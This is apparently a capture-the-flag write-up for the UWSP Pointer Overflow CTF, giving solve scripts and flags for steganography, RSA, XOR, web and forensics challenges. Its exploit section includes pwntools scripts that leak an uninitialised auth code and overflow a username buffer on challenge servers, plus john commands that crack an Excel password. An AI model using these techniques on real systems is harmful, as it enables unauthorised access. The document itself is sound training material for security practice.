UWSP Pointer Overflow CTF

Misc

Sight Without Vision

Here You See A Passer By

A maze: walk it to the exit and the flag is revealed.

poctf{uwsp_pr377y_bu7_p377y_bu7_pr377y}

Steg

Absence Makes Hearts Go Yonder

A GIF is given.

The flag is appended at the end of the file (visible with strings or a hex editor).

poctf{uwsp_h342d_y0u_7h3_f1257_71m3}

An Invincible Summer

Many pictures are given, and every picture comes in two formats. Two copies of the same image points at double-image steganography: combine (subtract) the pair.

Taking any two copies and subtracting them shows a sprinkling of odd red dots.

Saving the difference and extracting the dots gives plaintext.

So a script extracts it for every pair:

from PIL import Image

# Each picture appears twice (lossless .bmp next to its .jpg/.png);
# the pairs are adjacent in this list.
file_list = ['CD.bmp', 'CD.jpg', 'bat.bmp', 'bat.png', 'casette.bmp', 'casette.jpg', 'hand.bmp', 'hand.jpg', 'key.bmp', 'key.jpg', 'lock.bmp', 'lock.png', 'mittens.bmp', 'mittens.jpg', 'rug.bmp', 'rug.jpg', 'tapochki.bmp', 'tapochki.jpg', 'vhs.bmp', 'vhs.jpg', 'walkman.bmp', 'walkman.jpg']


def bin2bytes(data: str) -> bytes:
    """Pack a string of '0'/'1' characters into bytes, 8 bits per byte."""
    res = b''
    for i in range(len(data) // 8):
        res += int.to_bytes(int(data[i * 8:i * 8 + 8], 2), 1, 'big')
    return res


def image_sub(f1: Image.Image, f2: Image.Image, name: str) -> bytes:
    # Pixel-wise difference of the red channels; any non-zero difference
    # marks a pixel that was touched by the embedding.
    f3 = Image.new('1', (f1.width, f1.height))
    ch1 = f1.getchannel('R')
    ch2 = f2.getchannel('R')
    for i in range(f1.width):
        for j in range(f1.height):
            p1 = ch1.getpixel((i, j))
            p2 = ch2.getpixel((i, j))
            pixel = abs(p1 - p2)
            f3.putpixel((i, j), pixel)
    f3.save(f"{name}_sub.png")

    # Saving and reloading the 1-bit PNG normalises every non-zero
    # difference to 255, so the comparison below is reliable.
    f = Image.open(f"{name}_sub.png")
    data = ''
    for i in range(f.height):          # row-major: bits in reading order
        for j in range(f.width):
            pixel = f.getpixel((j, i))
            if pixel == 255:
                data += '1'
            else:
                data += '0'
    data = bin2bytes(data)
    return data


for i in range(len(file_list) // 2):
    f1 = Image.open(file_list[i * 2])
    f2 = Image.open(file_list[i * 2 + 1])
    data = image_sub(f1, f2, file_list[i * 2].split('.')[0])
    print(data.strip(b'\x00').decode(errors='ignore'))

#poctf{uwsp_1_h4v3_n0_m0u7h_4nd_1_mu57_5cr34m}

Between Secrets and Lies*

Web

We Rest Upon a Single Hope

A front-end challenge.

Run the page's own JavaScript and the flag falls out:

poctf{uwsp_1_4m_4ll_7h47_7h3r3_15_0f_7h3_m057_r34l}

Vigil of the Ceaseless Eyes

A forum.

Simply visiting it is enough:

poctf{uwsp_71m3_15_4n_1llu510n}

Quantity is Not Abundance

Adding a Referer header to the request is all it takes:

Referer: https://nvstgt.com/Quantity/index.html?

poctf{uwsp_1_h4v3_70_1n5157}

Crypto

Unquestioned and Unrestrained

Plain base64; decode it:

poctf{uwsp_411_y0u2_8453_423_8310n9_70_u5}

A Pale, Violet Light

e= 5039

N = 34034827

C = 933969 15848125 24252056 5387227 5511551 10881790 3267174 14500698 28242580 933969 32093017 18035208 2594090 2594090 9122397 21290815 15930721 4502231 5173234 21290815 23241728 2594090 21290815 18035208 10891227 15930721 202434 202434 21290815 5511551 202434 4502231 5173234 25243036

Textbook RSA with a tiny modulus: N is only 26 bits, so it factors immediately into p = 5807 and q = 5861. With d in hand each ciphertext block decrypts to one character of the flag.

from Crypto.Util.number import long_to_bytes, inverse   # pycryptodome

e = 5039
N = 34034827
p = 5807
q = 5861
C = [933969, 15848125, 24252056, 5387227, 5511551, 10881790, 3267174, 14500698, 28242580, 933969, 32093017, 18035208, 2594090, 2594090, 9122397, 21290815, 15930721, 4502231, 5173234, 21290815, 23241728, 2594090, 21290815, 18035208, 10891227, 15930721, 202434, 202434, 21290815, 5511551, 202434, 4502231, 5173234, 25243036]
phi = (p - 1) * (q - 1)
d = inverse(e, phi)
flag = b''
for i in C:
    flag += long_to_bytes(pow(i, d, N))   # one block, one character
print(flag)
#poctf{uwsp_533k_4nd_y3_5h411_f1nd}
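The writeup states p and q without showing where they came from. As an added example (my code, not the original author's), the block below recovers them by trial division, derives d with the standard library instead of pycryptodome, and decrypts block by block. The constants are the challenge values from above; the helper names are my own.

```python
# Added example (not from the original writeup): factor the 26-bit modulus
# by trial division, then decrypt the blocks with only the standard library.
from math import isqrt

E = 5039
N = 34034827
C = [933969, 15848125, 24252056, 5387227, 5511551, 10881790, 3267174,
     14500698, 28242580, 933969, 32093017, 18035208, 2594090, 2594090,
     9122397, 21290815, 15930721, 4502231, 5173234, 21290815, 23241728,
     2594090, 21290815, 18035208, 10891227, 15930721, 202434, 202434,
     21290815, 5511551, 202434, 4502231, 5173234, 25243036]


def trial_factor(n):
    """Return (p, q) with p <= q and p * q == n, found by trial division.

    Adequate for a modulus this small; for anything realistic reach for
    factordb, yafu/msieve, or Fermat/Pollard methods instead.
    """
    if n % 2 == 0:
        return 2, n // 2
    for p in range(3, isqrt(n) + 1, 2):
        if n % p == 0:
            return p, n // p
    raise ValueError("no non-trivial factor: n is prime or 1")


def rsa_private_exponent(e, p, q):
    """d = e^-1 mod phi(N); pow(e, -1, m) needs Python 3.8+."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def decrypt_blocks(blocks, d, n):
    """Decrypt each block and append its big-endian byte representation."""
    out = b""
    for c in blocks:
        m = pow(c, d, n)
        out += m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big")
    return out


def solve(e=E, n=N, blocks=C):
    p, q = trial_factor(n)
    d = rsa_private_exponent(e, p, q)
    return decrypt_blocks(blocks, d, n)


if __name__ == "__main__":
    print("p, q =", trial_factor(N))
    print(solve())
```

Because every block is a single character encrypted deterministically, the ciphertext is also a substitution cipher: repeated values in C (933969 at positions 0 and 9, both 'p') already betray repeated letters before any factoring is done.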

Missing and Missed

Brainfuck; running the program prints the flag:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.-.------------.+++++++++++++++++.--------------.+++++++++++++++++++++.------.++.----.---.-----------------.<<++++++++++++++++++++.-.++++++++.>>+++++++++.<<--.>>---------.++++++++++++++++++++++++.<<-----.--.>>---------.<<+++++++++.>>---------------.<<---------.++.>>.+++++++.<<--.++.+++++++.---------.+++++++..----.>>++++++++.+++++++++++++++.

poctf{uwsp_219h7_w20n9_02_f0290773n}
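An added example (my code, not part of the original writeup): a minimal Brainfuck interpreter so the program can be run offline with the bracket matching and 8-bit cell wrap made explicit. PROGRAM is the challenge program copied from above; the step limit and tape growth are my own additions.

```python
# Added example (not from the original writeup): a small Brainfuck interpreter.
PROGRAM = "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>++++++++++++.-.------------.+++++++++++++++++.--------------.+++++++++++++++++++++.------.++.----.---.-----------------.<<++++++++++++++++++++.-.++++++++.>>+++++++++.<<--.>>---------.++++++++++++++++++++++++.<<-----.--.>>---------.<<+++++++++.>>---------------.<<---------.++.>>.+++++++.<<--.++.+++++++.---------.+++++++..----.>>++++++++.+++++++++++++++."


def match_brackets(code):
    """Map every '[' to its ']' and back; raise on unbalanced brackets."""
    jump, stack = {}, []
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at {stack[-1]}")
    return jump


def run_bf(program, max_steps=1_000_000):
    """Execute a Brainfuck program with no input and return its output.

    Cells are 8-bit and wrap mod 256; the tape grows to the right on demand.
    max_steps bounds execution so a looping program cannot hang the caller.
    """
    code = [ch for ch in program if ch in "<>+-.,[]"]   # ignore comments
    jump = match_brackets(code)
    tape = bytearray(30000)
    ptr = pc = steps = 0
    out = []
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr == len(tape):
                tape.extend(bytes(1000))
        elif ch == "<":
            if ptr == 0:
                raise IndexError("tape pointer moved left of cell 0")
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == ",":
            tape[ptr] = 0            # no input stream: EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


if __name__ == "__main__":
    print(run_bf(PROGRAM))
```

The leading loop seeds four cells with 10, 30, 70 and 100; everything after it just nudges cells 2 and 4 up and down and prints them, which is why the program is dominated by runs of + and - rather than loops.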

Crack

We Mighty, We Meek*

Excel password brute force: extract the hash with office2john and run it through john with rockyou.

office2john crack1.xls > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The Gentle Rocking of the Sun

zwischen

After extracting, the result is still a chain of nested folders; each folder name is one piece of the flag, so walk the chain and concatenate the names:

import os

# Follow the single chain of nested directories; concatenating the
# directory names in order spells out the flag.
path = '2023'
flag = ''
while True:
    lst = os.listdir(path)
    if '.DS_Store' in lst:        # macOS metadata, not part of the chain
        lst.remove('.DS_Store')
    if lst:
        path = path + '/' + lst[0]
        flag += lst[0]
    else:
        break
print(flag)
#poctf{uwsp_c411f02n14_d234m1n9}

With Desperation and Need*

Brute-force the password of a VeraCrypt encrypted volume (not completed).

Reverse

Easy as it Gets

[Reflection.Assembly]::LoadWithPartialName("System.Security")  

function Encrypt-String($String, $Passphrase, $salt="SaltCrypto", $init="IV_Password", [switch]$arrayOutput)
{
$r = new-Object System.Security.Cryptography.RijndaelManaged
$pass = [Text.Encoding]::UTF8.GetBytes($Passphrase)
$salt = [Text.Encoding]::UTF8.GetBytes($salt)
$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) #256/8
$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]
$c = $r.CreateEncryptor()
$ms = new-Object IO.MemoryStream
$cs = new-Object Security.Cryptography.CryptoStream $ms,$c,"Write"
$sw = new-Object IO.StreamWriter $cs
$sw.Write($String)
$sw.Close()
$cs.Close()
$ms.Close()
$r.Clear()
[byte[]]$result = $ms.ToArray()
return [Convert]::ToBase64String($result)
}

function Decrypt-String($Encrypted, $Passphrase, $salt="SaltCrypto", $init="IV_Password")
{
if($Encrypted -is [string]){
$Encrypted = [Convert]::FromBase64String($Encrypted)
}

$r = new-Object System.Security.Cryptography.RijndaelManaged
$pass = [Text.Encoding]::UTF8.GetBytes($Passphrase)
$salt = [Text.Encoding]::UTF8.GetBytes($salt)
$r.Key = (new-Object Security.Cryptography.PasswordDeriveBytes $pass, $salt, "SHA1", 5).GetBytes(32) #256/8
$r.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash( [Text.Encoding]::UTF8.GetBytes($init) )[0..15]
$d = $r.CreateDecryptor()
$ms = new-Object IO.MemoryStream @(,$Encrypted)
$cs = new-Object Security.Cryptography.CryptoStream $ms,$d,"Read"
$sr = new-Object IO.StreamReader $cs

Write-Output $sr.ReadToEnd()

$sr.Close()
$cs.Close()
$ms.Close()
$r.Clear()
}

cls

####
# TODO: use strong password
# Canadian_Soap_Opera
###

$pwd = read-host "(Case Sensitive) Please Enter User Password"

$pcrypted = "TTpgx3Ve2kkHaFNfixbAJfwLqTGQdk9dkmWJ6/t0UCBH2pGyJP/XDrXpFlejfw9d"

write-host "Encrypted Password is: $pcrypted"
write-host ""
write-host "Testing Decryption of Username / Password..."
write-host ""

$pdecrypted = Decrypt-String $pcrypted $pwd

write-host "Decrypted Password is: $pdecrypted"

The passphrase is left behind in the TODO comment (Canadian_Soap_Opera); supplying it at the prompt decrypts $pcrypted to the flag:

poctf{uwsp_4d_v1c70r14m_w4573l4nd3r}

A Tangled Web We Weave

section .data
    encoded_message db 0x0F, 0x10, 0x1C, 0x0B, 0x19, 0x04, 0x0A, 0x08, 0x0C, 0x0F, 0x20, 0x14, 0x4E, 0x11, 0x46, 0x20, 0x14, 0x4F, 0x11, 0x46, 0x20, 0x46, 0x4F, 0x48, 0x20, 0x11, 0x4F, 0x48, 0x17, 0x4E, 0x11, 0x46, 0x20, 0x4F, 0x11, 0x20, 0x12, 0x4C, 0x02

section .text
global _start

_start:
    mov ecx, 0
    mov edi, encoded_message
find_length:                      ; ecx = strlen(encoded_message)
    cmp byte [edi], 0
    je print_message
    inc ecx
    inc edi
    jmp find_length

print_message:
    xor esi, esi
    mov edi, encoded_message
decode:                           ; in-place XOR of every byte with one key
    xor eax, eax
    mov al, byte [edi + esi]
    xor al, ; something missing?
    mov byte [edi + esi], al
    inc esi
    cmp byte [edi + esi], 0
    jne decode

    mov edx, ecx                  ; write(1, encoded_message, ecx)
    mov eax, 4
    mov ebx, 1
    mov ecx, encoded_message
    int 0x80

    mov eax, 1                    ; exit(0)
    xor ebx, ebx
    int 0x80

Single-byte XOR at a glance: the key byte has been removed from the decode loop, but since every flag starts with poctf{ the key is fixed by the first byte alone (0x0F ^ 'p' = 0x7F), and XORing the whole buffer with it gives the flag.

poctf{uwsp_k1n9_k0n9_907_n07h1n9_0n_m3}
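Added example (my code, not part of the original writeup or the challenge binary): recover the missing key byte from the known flag prefix, checking that one key is consistent with every prefix position, and as a fallback brute-force all 256 keys keeping only fully printable outputs. ENCODED is the challenge's encoded_message copied from the assembly; the function names are my own.

```python
# Added example (not from the original writeup): single-byte XOR recovery
# with known plaintext, plus a printable-output brute force as a fallback.
ENCODED = bytes([0x0F, 0x10, 0x1C, 0x0B, 0x19, 0x04, 0x0A, 0x08, 0x0C, 0x0F,
                 0x20, 0x14, 0x4E, 0x11, 0x46, 0x20, 0x14, 0x4F, 0x11, 0x46,
                 0x20, 0x46, 0x4F, 0x48, 0x20, 0x11, 0x4F, 0x48, 0x17, 0x4E,
                 0x11, 0x46, 0x20, 0x4F, 0x11, 0x20, 0x12, 0x4C, 0x02])
KNOWN_PREFIX = b"poctf{"


def xor_decode(data, key):
    """XOR every byte of data with the single key byte."""
    return bytes(b ^ key for b in data)


def recover_single_byte_key(data, known):
    """Return the one key byte consistent with every position of `known`.

    Returns None when the positions disagree, which means the cipher is
    not a single repeated byte (or the guessed plaintext is wrong).
    """
    candidates = {data[i] ^ known[i] for i in range(len(known))}
    return candidates.pop() if len(candidates) == 1 else None


def brute_force_printable(data):
    """No known plaintext: keep every key whose output is printable ASCII."""
    hits = []
    for key in range(256):
        pt = xor_decode(data, key)
        if all(0x20 <= b < 0x7F for b in pt):
            hits.append((key, pt))
    return hits


if __name__ == "__main__":
    key = recover_single_byte_key(ENCODED, KNOWN_PREFIX)
    print(f"key = {key:#04x}")
    print(xor_decode(ENCODED, key).decode())
    for k, pt in brute_force_printable(ENCODED):
        print(f"{k:#04x}: {pt.decode()}")
```

The consistency check matters more than the arithmetic: if the six prefix positions yielded different key bytes, the scheme would be a multi-byte or position-dependent XOR and the next step would be guessing the key length, not the key.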

Sunshine on Filth is Not Polluted

The hint is:

Uninitialized variables

The login path yields a shell.

The auth code is randomly generated.

In the confirm-username routine the username variable is never initialised, and debugging shows that at that moment local_18 still holds the leftover auth_code value from the earlier call.

So the exploit is:

from pwn import *

p = remote('34.123.210.162', 20231)
# Option 2: the last two bytes of the reply line carry the generated auth code.
p.sendlineafter(b'(3) Done: ', b'2')
data = p.recvline().strip()[-2:]
auth_code = int.from_bytes(data, 'little')
# Option 1 sets the username; option 3 then asks for the code, which the
# uninitialised local_18 still holds from before, so the leaked value matches.
p.sendlineafter(b'(3) Done: ', b'1')
p.sendlineafter(b'Username: ', b'admin')
p.sendlineafter(b'(3) Done: ', b'3')
p.sendlineafter(b'Enter your authentication code: ', str(auth_code).encode())
p.interactive()
#poctf{uwsp_7h3_1355_y0u_kn0w_7h3_837732}

Forensics

If You Don’t, Remember Me

poctf{uwsp_w31c0m3_70_7h3_94m3}

A Petty Wage in Regret

An image is given.

The image's sharpness is visibly off.

The first part of the flag sits in the ASCII of the EXIF data.

poctf{uwsp_7h3_w0rld_h4d_17_f1257}

Better to Burn in the Light

Recover files from the disk image.

Master File Table

binwalk carves out the first flag.

The CLUE in the EXIF data leads to the second image.

poctf{uwsp_5h1v3r_m3_71mb3r5}

Exploit

Did one of these at random and left the rest.

My Friend, A Loathsome Worm

The username input overflows its buffer; overwriting local_1c with 0x539 is enough.

from pwn import *

p = remote('34.123.210.162', 20232)
p.sendlineafter(b'Choice: ', b'1')
# 28 bytes of padding reach local_1c; the next two bytes are 0x539 little-endian.
p.sendlineafter(b'Enter new username: ', b'a' * 28 + b'\x39\x05')
p.sendlineafter(b'Choice: ', b'3')
p.interactive()
#poctf{uwsp_5w337_c10v32_4nd_50f7_511k}